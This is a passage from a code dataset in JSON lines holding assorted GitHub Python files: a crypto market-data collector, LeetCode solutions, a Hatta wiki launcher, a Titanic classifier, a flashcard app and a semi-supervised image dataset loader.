pia\n","repo_name":"rijaf-iri/mtorwaradar","sub_path":"mtorwaradar/util/pia.py","file_name":"pia.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1386976142","text":"from db_connector import engine\nfrom binance import ThreadedWebsocketManager\nfrom coinmarketcapapi import CoinMarketCapAPI\nfrom config import COINS, CRYPTO_TABLE_NAME\nfrom creds import MARKET_API_KEY, BINANCE_API_KEY, BINANCE_SECRET_KEY\nimport pandas as pd\nimport datetime\n\n\nclass MessageHandler():\n\n def __init__(self):\n self.last_hour = -1\n self.last_close = -1\n self.market_cap = self.get_market_cap()\n \n\n def handle_socket_message(self, msg):\n # Check if full minute passed\n if msg['k']['x']:\n df = pd.DataFrame([msg['k']])\n df = df.loc[:, ['t', 's', 'o', 'c', 'h', 'l', 'v', 'q']]\n df.columns = ['starttime', 'symbol', 'open',\n 'close', 'high', 'low', 'basevolume', 'quotevolume']\n df[\"market_cap\"] = 0\n symbol = df.loc[0, \"symbol\"]\n\n # Data Preperation\n df.open = df.open.astype(float)\n df.close = df.close.astype(float)\n df.high = df.high.astype(float)\n df.low = df.low.astype(float)\n df.market_cap = df.market_cap.astype(float)\n df.starttime = pd.to_datetime(df.starttime, unit=\"ms\")\n\n print(\"#############MARKET_CAP_TABLE#############\")\n print(self.market_cap)\n # Update market cap\n if self.last_hour != datetime.datetime.now().hour:\n self.market_cap = self.get_market_cap()\n self.last_hour = datetime.datetime.now().hour\n else:\n pct_change = 1\n if self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"].values[0] != -1:\n pct_change = df.loc[0, \"close\"] / self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"].values[0]\n self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"market_cap\"] *= pct_change\n print(pct_change)\n\n df[\"market_cap\"] = self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"market_cap\"].values[0]\n self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"] = df.loc[0, \"close\"]\n\n # Write to data base\n try:\n df.to_sql(CRYPTO_TABLE_NAME, engine, if_exists='append', index=False)\n except:\n print(\"DATABASE UNAVAILABLE SKIPPING WRITE\") \n print(\"#############WRITTEN DATA#############\")\n print(df)\n\n def get_market_cap(self):\n coins = \"\"\n for coin in COINS:\n coins += coin\n coins += \",\"\n coins = coins[:-1]\n coins\n\n cmc = CoinMarketCapAPI(api_key=MARKET_API_KEY)\n r = cmc.cryptocurrency_quotes_latest(symbol=coins, convert=\"EUR\")\n df = pd.DataFrame(r.data)\n df = df.transpose()\n df = df.drop([\"id\", \"name\",\"slug\",\"num_market_pairs\",\"date_added\",\"tags\", \"max_supply\",\"circulating_supply\",\"total_supply\",\"is_active\",\"platform\",\"cmc_rank\",\"is_fiat\",\"last_updated\"], axis=1)\n df[\"market_cap\"] = df[\"quote\"].apply(lambda x: x[\"EUR\"][\"market_cap\"])\n df = df.drop(\"quote\", axis=1)\n df[\"symbol\"] = df[\"symbol\"] + \"EUR\"\n df[\"last_close\"] = -1\n\n df.market_cap = df.market_cap.astype(float)\n df.last_close = df.last_close.astype(float)\n return df\n \n\n\nclass LiveDataCollector():\n\n def __init__(self):\n self.run = True\n self.twm = ThreadedWebsocketManager(\n api_key=BINANCE_API_KEY, api_secret=BINANCE_SECRET_KEY)\n\n def start(self):\n handler = MessageHandler()\n self.twm.start()\n\n # start any sockets here\n for coin in COINS:\n symbol = f\"{coin}EUR\"\n self.twm.start_kline_socket(\n callback=handler.handle_socket_message, symbol=symbol)\n print(f\"{symbol} socket started\")\n\n def stop(self):\n self.twm.stop()\n\n\nif __name__ == \"__main__\":\n ldc = LiveDataCollector()\n ldc.start()\n","repo_name":"chris-hoertnagl/market-analytics","sub_path":"coin_data_collector.py","file_name":"coin_data_collector.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41904388234","text":"# https://leetcode.com/problems/intersection-of-two-arrays/\n\n\n# Given two arrays, write a function to compute their intersection.\n#\n# Example:\n# Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2].\n#\n# Note:\n# Each element in the result must be unique.\n# The result can be in any order.\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n def preOrder(self, root, level, l):\n if root:\n if len(l) < level + 1:\n l.append([])\n if level % 2 == 0:\n l[level].append(root.val)\n else:\n l[level].insert(0, root.val)\n self.preOrder(root.left, level + 1, l)\n self.preOrder(root.right, level + 1, l)\n\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n l = []\n self.preOrder(root, 0, l)\n return l\n","repo_name":"Kimice/Recoba","sub_path":"leetcode/binary-tree-zigzag-level-order-traversal.py","file_name":"binary-tree-zigzag-level-order-traversal.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33616963558","text":"# Leetcode Problem 3 \n# Oct 1 2020\ndef lengthOfLongestSubstring(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n cur_s = \"\"\n maxl = 0\n dic = {}\n for c in s:\n if c in dic:\n ret_ind = 0\n for i in range(len(cur_s)):\n if cur_s[i] == c:\n ret_ind = i\n break\n del dic[cur_s[i]]\n del dic[c]\n cur_s = cur_s[ret_ind+1:]\n dic[c] = c\n cur_s = cur_s + c\n if len(cur_s) > maxl:\n maxl = len(cur_s)\n return maxl\n\n# print(lengthOfLongestSubstring(\"abcabcbb\")==3)\n\n","repo_name":"HuiwenHe19/Leetcode","sub_path":"prob3.py","file_name":"prob3.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8394598245","text":"import json\nimport os\nfrom createClass import People, DIR_FILE, make_dump\n\nmake_dump()\n\nwith open(DIR_FILE, 'r', encoding='utf-8') as file:\n dict_el = json.load(file)\n\n p1 = People(**dict_el)\n\nprint(\"Nome:\",p1.name)\nprint(\"Ano de nascimento:\",p1.age)\nprint(\"Email:\",p1.email)\n","repo_name":"Thiago-Teofilo/curso_python","sub_path":"python_curso_completo/m05_intro_poo/aula206_classe_json/loadClass.py","file_name":"loadClass.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10814807444","text":"class Solution(object):\n def minOperations(self, nums, x):\n sums = sum(nums)\n if x>sums:\n return -1\n if x==sums:\n return len(nums)\n \n sums = sums-x\n cur, start, ans = 0, 0, -1\n \n for end in range(len(nums)):\n if cur < sums:\n cur+=nums[end]\n \n while cur>=sums:\n if cur==sums:\n ans = max(ans, end-start+1)\n cur -= nums[start]\n start+=1\n \n return len(nums)-ans if ans!=-1 else an\n\nclass Solution(object):\n def minOperations(self, nums, x):\n arr_sum = sum(nums)\n if arr_sum < x:\n return -1\n if arr_sum == x:\n return len(nums)\n \n required_subarray_sum = arr_sum - x\n left = curr_sum = max_subarray_size = 0\n for right, num in enumerate(nums):\n curr_sum += num\n while curr_sum > required_subarray_sum:\n curr_sum -= nums[left]\n left += 1\n if curr_sum == required_subarray_sum:\n max_subarray_size = max(max_subarray_size, right - left + 1)\n \n return len(nums) - max_subarray_size if max_subarray_size > 0 else -1 ","repo_name":"Ayushmanglani/competitive_coding","sub_path":"leetcode/Jan_2021/14_MinimumOperationsToReduceXtoZero.py","file_name":"14_MinimumOperationsToReduceXtoZero.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72122434407","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom hatta.config import read_config\nfrom hatta.wiki import Wiki\n\n\n# Avoid WSGI errors, see http://mercurial.selenic.com/bts/issue1095\nsys.stdout = sys.__stdout__\nsys.stderr = sys.__stderr__\n\n\ndef application(env, start):\n \"\"\"Detect that we are being run as WSGI application.\"\"\"\n\n global application\n config = read_config()\n script_dir = os.path.dirname(os.path.abspath(__file__))\n if config.get('pages_path') is None:\n config.set('pages_path', os.path.join(script_dir, 'docs'))\n wiki = Wiki(config)\n application = wiki.application\n return application(env, start)\n\n\ndef main(config=None, wiki=None):\n \"\"\"Start a standalone WSGI server.\"\"\"\n\n config = config or read_config()\n wiki = wiki or Wiki(config)\n app = wiki.application\n\n host, port = (config.get('interface', '0.0.0.0'),\n int(config.get('port', 8080)))\n try:\n from cheroot import wsgi\n except ImportError:\n wsgi = None\n\n if wsgi is None:\n import werkzeug\n try:\n werkzeug.run_simple(host, port, app, use_reloader=False)\n except KeyboardInterrupt:\n pass\n else:\n name = wiki.site_name\n server = wsgi.Server((host, port), app,\n server_name=name)\n try:\n server.start()\n except KeyboardInterrupt:\n server.stop()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"davestgermain/hatta","sub_path":"hatta/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17211737672","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\n# Load the training and test data\ntrain_df = pd.read_csv(\"train.csv\")\ntest_df = pd.read_csv(\"test.csv\")\n\n# Initial data exploration\ntrain_df.head()\ntrain_df.info()\ntrain_df.describe()\nsns.countplot(x='Survived', data=train_df)\n\n# Data preprocessing\ntrain_df.drop(columns=['Cabin'], inplace=True)\ntest_df.drop(columns=['Cabin'], inplace=True)\ntrain_df['Age'].fillna(train_df['Age'].mean(), inplace=True)\ntrain_df['Embarked'].fillna(train_df['Embarked'].mode()[0], inplace=True)\ntest_df['Age'].fillna(test_df['Age'].mean(), inplace=True)\ntest_df['Fare'].fillna(test_df['Fare'].mean(), inplace=True)\n\n# Feature engineering\ntrain_df['Title'] = train_df['Name'].apply(lambda x: x.split(',')[1].split('.')[0].strip())\ntest_df['Title'] = test_df['Name'].apply(lambda x: x.split(',')[1].split('.')[0].strip())\ntrain_df['Title'].replace(['Dr', 'Rev', 'Col', 'Major', 'Jonkheer', 'Capt'], 'Rare', inplace=True)\ntrain_df['Title'].replace(['Ms', 'Mlle'], 'Miss', inplace=True)\ntest_df['Title'].replace(['Dr', 'Rev', 'Col', 'Major', 'Jonkheer', 'Capt'], 'Rare', inplace=True)\ntest_df['Title'].replace(['Ms', 'Mlle'], 'Miss', inplace=True)\n\n# Select the relevant features and target variable\nX_train = train_df[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Title']]\ny_train = train_df['Survived']\nX_test = test_df[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Title']]\n\n# One-hot encode the categorical features\nX_train = pd.get_dummies(X_train)\nX_test = pd.get_dummies(X_test)\n\n# Create a random forest classifier and fit it on the training data\nrf = RandomForestClassifier(n_estimators=100, random_state=42)\nrf.fit(X_train, y_train)\n\n# Use the trained model to make predictions on the test data\ny_pred = rf.predict(X_test)\n\n# Save the predictions in a CSV file\nsubmission_df = pd.DataFrame({'PassengerId': test_df['PassengerId'], 'Survived': y_pred})\nsubmission_df.to_csv('submission.csv', index=False)\n","repo_name":"jm0rt1/value-investing-data-mining","sub_path":"docs/examples/obselete/predicting_titanic_survival.py","file_name":"predicting_titanic_survival.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42298973567","text":"BACKGROUND_COLOR = \"#B1DDC6\"\n\nfrom tkinter import *\nimport pandas\nimport random\n\ncurrent_card = {}\ndata_dict = {}\n\ntry:\n data = pandas.read_csv('data/words_to_learn.csv')\nexcept FileNotFoundError:\n original_data = pandas.read_csv('data/french_words.csv')\n data_dict = original_data.to_dict(orient=\"records\")\nelse:\n data_dict = data.to_dict(orient=\"records\")\n\n\n\ndef next_card():\n global current_card, flip_timer\n window.after_cancel(flip_timer)\n current_card = random.choice(data_dict)\n canvas.itemconfig(language, text=\"French\", fill=\"black\")\n canvas.itemconfig(question, text=current_card[\"French\"], fill=\"black\")\n canvas.itemconfig(canvas_image, image=front_img)\n flip_timer = window.after(3000, flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(canvas_image, image=back_img)\n canvas.itemconfig(language, text=\"English\", fill=\"white\")\n canvas.itemconfig(question, text=current_card[\"English\"], fill=\"white\")\n\n\ndef is_known():\n data_dict.remove(current_card)\n data = pandas.DataFrame(data_dict)\n data.to_csv(\"data/words_to_learn.csv\", index=False)\n next_card()\n\n\nwindow = Tk()\nwindow.title(\"Flashy\")\nwindow.config(bg=BACKGROUND_COLOR, padx=50, pady=50)\n\nflip_timer = window.after(3000, flip_card)\n\ncanvas = Canvas(width=800, height=526, highlightthickness=0, bg=BACKGROUND_COLOR)\nback_img = PhotoImage(file=\"images/card_back.png\")\nfront_img = PhotoImage(file=\"images/card_front.png\")\ncanvas_image = canvas.create_image(400, 263, image=front_img)\n\nlanguage = canvas.create_text(400, 150, text=\"French\", font=(\"Arial\", 40, \"italic\"))\nquestion = canvas.create_text(400, 283, text=\"SubTitle\", font=(\"Arial\", 60, \"italic\"))\ncanvas.grid(column=0, row=0, columnspan=2)\n\n\nwrong_img = PhotoImage(file=\"images/wrong.png\")\nwrong_button = Button(image=wrong_img, highlightthickness=0, command=next_card)\nwrong_button.grid(column=0, row=1)\n\nright_img = PhotoImage(file=\"images/right.png\")\nright_button = Button(image=right_img, highlightthickness=0, command=is_known)\nright_button.grid(column=1, row=1)\n\nnext_card()\n\nwindow.mainloop()\n\n","repo_name":"NilGamer/flash_card_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22862660976","text":"with open('day9/data.txt') as f:\n data = f.readlines()\n\nfor i in range(len(data)-1):\n data[i] = int(data[i][:-1])\n\ndata[len(data)-1] = int(data[len(data)-1])\n\n\nfor i in range(25,len(data)):\n start = i - 25\n end = i - 1\n to_parse = sorted(data[start:end+1])\n lo = 0\n hi = len(to_parse)-1\n while lo <= hi:\n if lo == hi:\n print(data[i])\n break\n else:\n if to_parse[lo]+ to_parse[hi] < data[i]:\n lo+=1\n #print(lo)\n elif to_parse[lo] + to_parse[hi] > data[i]:\n hi-=1\n #print(hi)\n else:\n break\n \n \n","repo_name":"nguyenethan01/advent2020","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34737163056","text":"from django.db import models\n\n\nclass AnoContabil(models.Model):\n '''\n A classe AnoContabil serve para registrarmos os anos contábeis.\n Além de fazer as implementações relacionadas a um único ano contábil.\n '''\n\n nome = models.CharField(\n verbose_name='Nome',\n max_length=100\n )\n\n data_inicial = models.DateField(\n verbose_name='Data inicial'\n )\n\n data_final = models.DateField(\n verbose_name='Data final'\n )\n\n aberto = models.BooleanField(\n verbose_name='Aberto?',\n default=False\n )\n\n def __str__(self):\n return self.nome\n\n class Meta:\n app_label = 'financeiro'\n verbose_name = 'Ano contábil'\n verbose_name_plural = 'Anos contábeis'\n","repo_name":"TimeNovaData/app_financeiro","sub_path":"models/ano_contabil.py","file_name":"ano_contabil.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19096375842","text":"class Solution:\n def largestNumber(self, nums: List[int]) -> str:\n for i,n in enumerate(nums):\n nums[i]=str(n)\n def compare(n1,n2):\n if n1+n2>n2+n1:\n return -1\n else:\n return 1\n nums=sorted(nums,key=cmp_to_key(compare))\n #[0,0,0]=\"000\" must be retured as \"0\" so to do this first we convert it to int then to string\n return str(int(\"\".join(nums)))\n \n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"0179-largest-number/0179-largest-number.py","file_name":"0179-largest-number.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8616776099","text":"from django.core.management.base import BaseCommand\nfrom rooms import models as room_models\n\n\nclass Command(BaseCommand):\n\n help = \"This command creates houserules\"\n # def add_arguments(self, parser):\n # parser.add_argument(\"--times\", help=\"how many times\")\n\n def handle(self, *args, **options):\n houserules = [\n \"키패드로 셀프 체크인\",\n \"열쇠 보관함으로 체크인\",\n \"안내 직원(으)로 셀프 체크인\",\n \"흡연 금지\",\n \"반려동물 동반 불가\",\n \"어린이와 유아에게 적합하지 않음\",\n \"파티 또는 이벤트 금지\",\n ]\n\n for r in houserules:\n room_models.HouseRule.objects.create(name=r)\n\n self.stdout.write(self.style.SUCCESS(\"Houserules Created\"))","repo_name":"GisangLee/fullstack_practice","sub_path":"rooms/management/commands/seed_houserules.py","file_name":"seed_houserules.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34402295712","text":"\nfrom sqlalchemy import Column, Index\nfrom sqlalchemy import String, Integer, Date, DateTime, Float, Numeric, ForeignKey\nfrom sqlalchemy.types import ARRAY, JSON\nfrom sqlalchemy import and_, or_\nfrom sqlalchemy.dialects.postgresql import UUID\n\nfrom sqlalchemy.orm import relationship, backref\n\nfrom openapi_server.models.attr import Attr as AttrApi\n\nfrom backbone_server.model.mixins import Base\nfrom backbone_server.model.study import Study\n\nclass Attr(Base):\n\n\n study_id = Column('study_id',\n UUID(as_uuid=True),\n ForeignKey('study.id'))\n attr_type = Column(String(256), index=True)\n attr_value_str = Column(String(256), index=True)\n attr_value_int = Column(Integer, index=True)\n attr_value_float = Column(Float, index=True)\n attr_value_decimal = Column(Numeric, index=True)\n attr_value_date = Column(Date, index=True)\n attr_value_datetime = Column(DateTime, index=True)\n attr_value_list_int = Column(ARRAY(Integer))\n attr_value_object = Column(JSON)\n attr_source = Column(String(256))\n\n study = relationship('Study',\n backref=backref('attr'))\n\n openapi_class = AttrApi\n\n def submapped_items(self):\n return {\n 'study_name': 'study.name',\n }\n\n @staticmethod\n def get_query(db, api_attr, value_type=None, user=None):\n\n study_id = None\n if not api_attr.attr_value:\n return None\n if value_type:\n value_type = 'attr_value_' + value_type\n else:\n value_type = 'attr_value_' + type(api_attr.attr_value).__name__\n if value_type == 'attr_value_list':\n value_type = value_type + '_' + type(api_attr.attr_value[0]).__name__\n if isinstance(api_attr.attr_value, str):\n import urllib\n api_attr.attr_value = urllib.parse.unquote_plus(api_attr.attr_value)\n\n attr_query = db.query(Attr).filter(and_(Attr.attr_type == api_attr.attr_type,\n Attr.__table__.c[value_type] == api_attr.attr_value))\n if api_attr.attr_source:\n attr_query = attr_query.filter(or_(Attr.attr_source == api_attr.attr_source, Attr.attr_source == None))\n if api_attr.study_name:\n study = Study.get_or_create_study(db, api_attr.study_name, user)\n study_id = study.id\n attr_query = attr_query.filter(or_(Attr.study_id == study_id, Attr.study_id == None))\n\n return attr_query\n\n @staticmethod\n def get(db, api_attr, value_type=None, user=None):\n\n query = Attr.get_query(db, api_attr, value_type, user=user)\n\n if query:\n return query.first()\n return None\n\n @staticmethod\n def get_or_create(db, api_attr, value_type=None, user=None):\n\n attr = Attr.get(db, api_attr, value_type, user=user)\n\n if attr is None:\n study_id = None\n if api_attr.study_name:\n study = Study.get_or_create_study(db, api_attr.study_name, user)\n study_id = study.id\n attr = Attr(attr_type=api_attr.attr_type,\n attr_source=api_attr.attr_source,\n study_id=study_id)\n if not value_type:\n value_type = 'attr_value_' + type(api_attr.attr_value).__name__\n setattr(attr, value_type, api_attr.attr_value)\n db.add(attr)\n db.commit()\n attr = Attr.get(db, api_attr)\n\n return attr\n\n @staticmethod\n def get_all(db, api_attr, value_type=None, user=None):\n\n\n query = Attr.get_query(db, api_attr, value_type, user=user)\n\n if not query:\n return\n\n for attr in query.all():\n yield attr\n\n study = relationship(\"Study\")\n def __repr__(self):\n return f''''''\n\nIndex('idx_attr_index', Attr.attr_type, Attr.attr_value_str)\n","repo_name":"malariagen/sims-backbone","sub_path":"server/backbone_server/model/attr.py","file_name":"attr.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34943469917","text":"# coding=utf-8\ndef fibo(n):\n a, b = 0, 1\n while b < n:\n print(b)\n a, b = b, a + b\n print\n\n\ndef fibo2(n):\n result = []\n a, b = 0, 1\n while b < n:\n result.append(b)\n a, b = b, a + b\n return result\n\n\n'''\n一个模块被另一个模块第一次引入 的时候,其主程序将被执行。如果我们想在模块被引入时,模块中的某一个程序块不执行,这时候可以用__name__来使\n该程序仅在自身模块运行时执行。\n每一个模块都有一个__name__属性,当其值是'__main__'时,表明该模块自身在运行,否则是其他模块在引入。\n'''\nif __name__ == '__main__':\n print(\"程序自身运行\")\nelse:\n print(\"我来子另一模块\")\n","repo_name":"zoushiqing/python","sub_path":"基础/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994202407","text":"print(\"PygLatin\")\r\n\r\npyg = \"ay\"\r\nasli = input(\"Enter any word: \")\r\nif len(asli) > 0 and asli.isalpha():\r\n word = asli.lower()\r\n first = word[0]\r\n new_word = word[1:]\r\n new_word = new_word + first + pyg\r\n print(new_word)\r\nelse:\r\n print(u\"آپ نے کوئي لفظ درج نہيں کيا ہے۔\")\r\n","repo_name":"yethrosh/Python","sub_path":"PygLatin.py","file_name":"PygLatin.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13553716958","text":"import pandas as pd\r\ndf= pd.read_csv(\"internship_prediction_based.csv\")\r\n\r\nX = df.iloc[:, [2, 3]].values\r\ny = df.iloc[:, 4].values\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(X,y,\r\n test_size=.25,random_state=42)\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nms=MinMaxScaler()\r\nx_train=ms.fit_transform(x_train)\r\nx_test=ms.transform(x_test)\r\n\r\nfrom sklearn.svm import SVC\r\nmodel=SVC(kernel='linear',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Linear Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='rbf',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"RBF Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='poly',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Poly Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='sigmoid',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Sigmoid Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nfrom sklearn.naive_bayes import GaussianNB\r\ngb=GaussianNB()\r\ngb.fit(x_train,y_train)\r\ny_pred=gb.predict(x_test)\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"NB accuracy=\",accuracy_score(y_test,y_pred))","repo_name":"Bose-info/internship_prediction_based-ML-project","sub_path":"internship_prediction_based.py","file_name":"internship_prediction_based.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34177411652","text":"from torchvision.datasets import CIFAR10, CIFAR100, SVHN\nfrom torch.utils.data import Sampler, Dataset\nfrom torchvision import transforms\nimport torch\nimport numpy as np\n\nimport os\nimport pickle\nimport pdb\n\nimport logging\n\nfrom hashlib import md5\n\nDATASETS = ['cifar10', 'svhn']\n\n\nclass SemiSupervisedDataset(Dataset):\n def __init__(self,\n base_dataset='cifar10',\n downsample=1,\n take_fraction=None,\n take_amount_seed=1,\n semisupervised=False,\n sup_labels=None,\n unsup_labels=None,\n test_labels=None,\n add_cifar100=False,\n add_svhn_extra=False,\n aux_data_filename=None,\n aux_targets_filename=None,\n add_aux_labels=False,\n aux_take_amount=None,\n aux_label_noise=None,\n train=False,\n **kwargs):\n\n if base_dataset == 'cifar10':\n self.dataset = CIFAR10(train=train, **kwargs)\n elif base_dataset == 'svhn':\n if train:\n self.dataset = SVHN(split='train', **kwargs)\n else:\n self.dataset = SVHN(split='test', **kwargs)\n # because torchvision is annoying\n self.dataset.targets = self.dataset.labels\n self.targets = list(self.targets)\n\n if train and add_svhn_extra:\n svhn_extra = SVHN(split='extra', **kwargs)\n self.data = np.concatenate([self.data, svhn_extra.data])\n self.targets.extend(svhn_extra.labels)\n else:\n raise ValueError('Dataset %s not supported' % base_dataset)\n self.base_dataset = base_dataset\n self.train = train\n self.transform = self.dataset.transform\n\n if self.train:\n # Collecting subset of train data with relevant labels\n if sup_labels is not None:\n self.sup_indices = [i for (i, label) in enumerate(self.targets)\n if label in sup_labels]\n else:\n self.sup_indices = np.arange(len(self.targets))\n sup_labels = range(max(self.targets) + 1)\n\n # Collecting subset of train data with relevant labels\n if unsup_labels is not None:\n self.unsup_indices = [i for (i, label) in\n enumerate(self.targets)\n if label in unsup_labels]\n else:\n self.unsup_indices = np.arange(len(self.targets))\n\n self.sup_indices = self.sup_indices[::downsample]\n if take_fraction is not None:\n rng_state = np.random.get_state()\n np.random.seed(take_amount_seed)\n take_inds = np.random.choice(len(self.sup_indices),\n int(take_fraction*len(self.sup_indices)),\n replace=False)\n np.random.set_state(rng_state)\n\n logger = logging.getLogger()\n logger.info('Randomly taking only %d/%d examples from training'\n ' set, seed=%d, indices=%s',\n take_fraction*len(self.sup_indices), len(self.sup_indices),\n take_amount_seed, take_inds)\n self.sup_indices = self.sup_indices[take_inds]\n\n self.unsup_indices = list(set(self.unsup_indices)\n - set(self.sup_indices))\n\n if semisupervised:\n labeled = [self.targets[i] for i in self.sup_indices]\n labeled = [sup_labels.index(i) for i in labeled]\n unlabeled = [-1] * len(self.unsup_indices)\n self.targets = labeled + unlabeled\n self.data = np.concatenate((self.data[self.sup_indices],\n self.data[self.unsup_indices]),\n axis=0)\n self.sup_indices = list(range(len(self.sup_indices)))\n self.unsup_indices = list(\n range(len(self.sup_indices),\n len(self.sup_indices)+len(self.unsup_indices)))\n # self.train_labels = [\n # label if i % downsample == 0 else -1\n # for (i, label) in enumerate(self.train_labels)]\n else:\n self.all_targets = np.copy(self.targets)\n self.all_data = np.copy(self.data)\n self.targets = [self.targets[i] for i in self.sup_indices]\n self.targets = [sup_labels.index(i) for i in self.targets]\n self.data = self.data[self.sup_indices, ...]\n self.sup_indices = list(range(len(self.sup_indices)))\n\n self.orig_len = len(self.data)\n if add_cifar100:\n orig_len = len(self.data)\n cifar100 = CIFAR100(**kwargs)\n self.data = np.concatenate((self.data, cifar100.data), axis=0)\n self.targets.extend([-1] * len(cifar100.targets))\n self.unsup_indices.extend(\n range(orig_len, orig_len + len(cifar100)))\n\n if aux_data_filename is not None:\n aux_path = os.path.join(kwargs['root'], aux_data_filename)\n print(\"Loading data from %s\" % aux_path)\n with open(aux_path, 'rb') as f:\n aux = pickle.load(f)\n aux_data = aux['data']\n aux_targets = aux['extrapolated_targets']\n orig_len = len(self.data)\n\n if aux_take_amount is not None:\n rng_state = np.random.get_state()\n np.random.seed(take_amount_seed)\n take_inds = np.random.choice(len(aux_data),\n aux_take_amount, replace=False)\n np.random.set_state(rng_state)\n\n logger = logging.getLogger()\n logger.info(\n 'Randomly taking only %d/%d examples from aux data'\n ' set, seed=%d, indices=%s',\n aux_take_amount, len(aux_data),\n take_amount_seed, take_inds)\n aux_data = aux_data[take_inds]\n aux_targets = aux_targets[take_inds]\n\n if not add_aux_labels:\n self.targets.extend([-1] * len(aux_data))\n else:\n if aux_targets_filename is not None:\n aux_path = aux_targets_filename\n print(\"Loading data from %s\" % aux_path)\n with open(aux_path, 'rb') as f:\n aux = pickle.load(f)\n new_aux_targets = aux['extrapolated_targets']\n n = len(aux_targets)\n print('Difference between new and old extrapolated targets = %.3g%%' %\n (100 * (aux_targets != new_aux_targets[:n]).mean()))\n\n if (len(new_aux_targets) > len(aux_targets)):\n assert(len(new_aux_targets) - len(aux_targets) == len(self.unsup_indices))\n true_labels = [self.all_targets[i] for i in self.unsup_indices]\n print('Difference between extrapolated and true labels on training set = %.3g%%' %\n (100 * (true_labels != new_aux_targets[n:]).mean()))\n logging.info('Adding unsupervised %d examples from training data' %(len(self.unsup_indices)))\n unlabeled_data = self.all_data[self.unsup_indices]\n # Since new targets are now included\n self.unsup_indices = []\n aux_data = np.concatenate((aux_data, unlabeled_data), axis=0)\n aux_targets = new_aux_targets\n\n else:\n self.unsup_indices=[]\n if aux_label_noise:\n num_aux = 